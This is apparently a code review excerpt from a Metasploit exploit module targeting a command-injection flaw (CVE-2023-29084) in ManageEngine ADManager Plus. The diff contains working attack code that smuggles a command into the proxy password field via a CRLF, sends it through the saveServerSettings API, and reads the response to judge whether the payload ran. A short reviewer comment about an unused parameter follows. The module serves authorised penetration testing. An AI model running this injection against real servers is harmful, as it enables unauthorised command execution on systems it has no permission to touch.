modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb

```diff
@@ -0,0 +1,287 @@
+      {
+        'uri' => normalize_uri(target_uri.path, 'api', 'json', 'admin', 'getServerSettings'),
+        'method' => 'POST',
+        'vars_post' => {
+          'adscsrf' => @csrf_cookie
+        },
+        'keep_cookies' => true
+      }
+    )
+
+    unless res && res.code == 200 && res&.body&.match(/ads_admin_notifications/)
+      fail_with(Failure::UnexpectedReply, 'Was unable to get the admin settings for restoration!')
+    end
+
+    json_body = JSON.parse(res.body)
+    server_details = json_body['serverDetails']
+    unless server_details
+      fail_with(Failure::UnexpectedReply, 'Was unable to retrieve the server settings!')
+    end
+
+    server_details.each do |elm|
+      next unless elm['tabId'] == 'proxy'
+
+      @original_port = elm['PORT']
+      @original_password = elm['PASSWORD']
+      @proxy_enabled = elm['ENABLE_PROXY']
+      @original_server_name = elm['SERVER_NAME']
+      @original_user_name = elm['USER_NAME']
+      break
+    end
+  end
+
+  def modify_proxy(params)
+    res = send_request_cgi(
+      {
+        'uri' => normalize_uri(target_uri.path, 'api', 'json', 'admin', 'saveServerSettings'),
+        'method' => 'POST',
+        'vars_post' => {
+          'adscsrf' => @csrf_cookie,
+          'params' => params
+        },
+        'keep_cookies' => true
+      }
+    )
+
+    if res && res.code == 200
+      if res.body&.match(/{"isAuthorized":false}/)
+        fail_with(Failure::NoAccess, 'Somehow we became unauthenticated during exploitation!')
+      elsif res.body&.match(/Successfully updated the following settings.*-.*Proxy Settings/)
+        print_warning("Settings successfully changed but the fact that the server responded likely means the payload didn't execute!")
+      elsif res.body&.match(/"status":"error"/)
+        print_error("The payload somehow triggered an error on the target's side! Error was: #{res.body}")
+      else
+        fail_with(Failure::PayloadFailed, 'Was not able to successfully update the settings to execute the payload!')
+      end
+    elsif res.nil?
+      print_good('Request timed out. Its likely the payload executed successfully!')
+    else
+      fail_with(Failure::UnexpectedReply, "Target responded with a non-200 OK code to our saveServerSettings request! Code was #{res.code}")
+    end
+  end
+
+  def create_params_value_enable(cmd)
+    [
+      {
+        tabId: 'proxy',
+        ENABLE_PROXY: true,
+        SERVER_NAME: 'localhost', # In my experience this worked most reliably.
+        USER_NAME: Rex::Text.rand_text_alphanumeric(4..20).to_s,
+        PASSWORD: "#{Rex::Text.rand_text_alphanumeric(4..20)}\r\n#{cmd}",
+        PORT: datastore['RPORT'] # In my experience, setting this to the same PORT as the web server worked reliably.
+      }
+    ].to_json
+  end
+
+  def create_params_value_restore(enable_proxy = nil)
+    if enable_proxy.blank?
+      @proxy_enabled = false
+    else
+      @proxy_enabled = true
+    end
+
+    [
```

Comment:
This can be simplified because `enable_proxy` will always be nil. I can't see where `#create_params_value_restore` is called with an argument.

```suggestion
  def create_params_value_restore
    [
```

Reply:
Ah thanks this is left over from some refactoring that I did of the code and can be safely removed. Thanks for the spot!